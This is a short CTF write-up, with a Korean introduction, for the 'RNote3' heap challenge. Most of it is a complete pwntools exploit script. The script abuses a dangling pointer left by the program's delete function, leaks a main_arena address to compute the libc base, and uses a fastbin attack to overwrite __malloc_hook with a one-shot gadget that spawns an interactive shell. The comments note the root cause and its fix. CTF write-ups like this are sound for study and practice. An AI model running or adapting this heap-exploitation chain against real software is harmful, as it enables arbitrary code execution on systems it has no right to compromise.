재미있었던 문제!!
delete 함수의 ptr을 초기화 하지 않아서 문제가 생긴다!! 초기화를 했는지 잘 살펴봐야겠다..ㅎㅎ 나머지는 간단하게 main_arena 쓱쓱 가져와서 libc 따고, malloc_hook 주변에 할당받고 malloc_hook 덮어주면 끝!
from pwn import *
# Binary under test and the libc it links against; both ELF objects are kept
# for symbol lookups (libc.symbols is read further down).
elf = ELF("./RNote3")
libc = ELF("./libc")
# Local process the helper functions below drive through the menu.
s = process("./RNote3")
def add(title, size, content):
    """Menu option 1: create a note with *title*, a content buffer of *size* bytes and *content*.

    Each prompt is consumed before the corresponding answer is sent; nothing is returned.
    """
    s.sendline("1")
    s.sendlineafter("please input title: ", title)
    s.sendlineafter("please input content size: ", str(size))
    s.sendlineafter("please input content: ", content)
def view(title):
    """Menu option 2: ask the program to print the note called *title*.

    The reply is left in the tube for the caller to read.
    """
    s.sendline("2")
    s.sendlineafter("please input note title: ", title)
def edit(title, content):
    """Menu option 3: replace the content of the note called *title* with *content*."""
    s.sendline("3")
    s.sendlineafter("please input note title: ", title)
    s.sendlineafter("please input new content: ", content)
def dell(title):
    """Menu option 4: delete the note called *title*.

    Per the write-up above, the program's delete path frees the note but does not
    clear its pointer, which is the bug the rest of the script depends on.
    """
    s.sendline("4")
    s.sendlineafter("please input note title: ", title)
def quit():
    """Menu option 5: ask the program to exit.

    The name shadows the builtin ``quit``; it is kept unchanged for callers.
    """
    s.sendline("5")
# --- main sequence -------------------------------------------------------
# Root cause (from the write-up above): delete() frees a note but leaves its
# pointer set, so a freed note stays reachable through view()/edit()/delete().
# The defender-side fix is clearing the pointer after free(). Every offset
# below is specific to the ./RNote3 and ./libc files used here.
gdb.attach(s)  # debugging aid: needs a terminal with gdb attached; drop for unattended runs
add("1"*4,128,"A"*8)
add("2"*4,128,"B"*8)
dell("1"*4)
add("3"*4,128,"C"*8)
dell("A")
# Per the write-up, viewing the freed note exposes a main_arena address.
view("\x00")
s.recvuntil("note content: ")
leak = u64(s.recv(6)+"\x00\x00")  # 6-byte address, zero-padded to 8 bytes for u64()
print "leak : " + hex(leak)
libc_base = leak - 0x3c4b78  # distance of the leaked pointer from libc base (page-specific value)
print "libc_base : " + hex(libc_base)
one_shot = libc_base + 0xf02a4  # gadget offset inside ./libc (page-specific value)
malloc_hook = libc_base + libc.symbols['__malloc_hook']  # resolved from the ELF symbol table
print "one_shot : " + hex(one_shot)
print "malloc_hook : " + hex(malloc_hook)
# Second round with 0x60-byte notes: per the write-up, a chunk is obtained near
# __malloc_hook and the hook is then overwritten with one_shot.
add("4"*4,0x60,"D"*8)
add("5"*4,0x60,"E"*8)
dell("4"*4)
add("6"*4,0x60,"F"*8)
dell("asd")
edit("\x00",p64(malloc_hook-35))  # NOTE(review): -35 is a layout-specific offset; not explained on this page
add("7"*4,0x60,"G"*8)
add("8"*4,0x60,"H"*19+p64(one_shot))  # 19 bytes of padding, then one_shot — per the write-up this lands on __malloc_hook
dell("2")  # NOTE(review): presumably the call that ends up invoking the hook — confirm against the binary's delete path
s.interactive()